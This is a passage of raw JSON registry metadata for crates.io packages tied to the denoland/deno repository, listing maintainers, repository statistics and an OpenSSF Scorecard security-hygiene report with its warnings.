past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup-rs/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup-rs/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup-rs/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup-rs/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup-rs/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup-rs/codemeta","maintainers":[{"uuid":"193057","login":"TylerJerme","name":null,"email":null,"url":"https://github.com/TylerJerme","packages_count":4,"html_url":"https://crates.io/users/TylerJerme","role":null,"created_at":"2023-01-11T08:25:06.880Z","updated_at":"2023-01-11T08:25:06.880Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/TylerJerme/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":7246594,"name":"deno_cli_lib_windmill","ecosystem":"cargo","description":"Deno cli lib for the needs of windmill","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":2,"first_release_published_at":"2023-04-01T14:14:07.761Z","latest_release_published_at":"2023-04-03T16:37:01.501Z","latest_release_number":"0.104.0","last_synced_at":"2026-08-29T21:57:43.029Z","created_at":"2023-04-01T14:43:38.067Z","updated_at":"2026-08-29T21:57:43.030Z","registry_url":"https://crates.io/crates/deno_cli_lib_windmill/","install_command":"cargo install deno_cli_lib_windmill","documentation_url":"https://docs.rs/deno_cli_lib_windmill/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denol